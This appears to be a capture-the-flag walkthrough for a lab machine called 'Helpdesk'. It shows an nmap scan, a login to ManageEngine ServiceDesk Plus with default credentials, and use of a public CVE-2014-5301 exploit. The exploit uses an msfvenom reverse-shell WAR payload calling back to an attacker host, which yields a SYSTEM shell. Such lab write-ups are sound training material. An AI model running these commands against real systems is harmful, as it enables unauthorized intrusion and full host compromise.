# Helpdesk

```
sudo nmap 192.168.214.43 -p- -sS -sV

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
```

The root page on port 8080 lands us on a login page for ManageEngine ServiceDesk Plus.

![http://192.168.214.43:8080/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a27b0f227dd82557df0cc9103fd5a03f594b0719%2Fimage.png?alt=media)

This is running version 7.6.0, as per the information available on screen. Looking up default credentials on Google shows we can try `administrator:administrator`. This proves successful and we are able to log in.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-00bc228d14b85fe622bdb6e250aa5bb4a24e0585%2Fimage.png?alt=media)

Researching exploits for this particular version, we come across **CVE-2014-5301**.

**Description:**

Directory traversal vulnerability in ServiceDesk Plus MSP v5 to v9.0 v9030; AssetExplorer v4 to v6.1; SupportCenter v5 to v7.9; IT360 v8 to v10.4.

Looking for available exploits, we come to: [https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py](https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py)

As per the exploit instructions contained in the script, generate a WAR file with `msfvenom`:

```
msfvenom -p java/shell_reverse_tcp LHOST=192.168.49.214 LPORT=445 -f war > /home/kali/Desktop/shell.war
```

Then execute with the following syntax:

```
# Script usage: ./CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE
sudo python3 exploit.py 192.168.214.43 8080 administrator administrator shell.war
```

A shell running as SYSTEM should be received on the `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8a83c57cc6eaf142f810f10be9bcebd0b0c74be9%2Fimage.png?alt=media)

{% hint style="info" %}
If you get a Java heap error on the shell, revert the machine and try again.
{% endhint %}
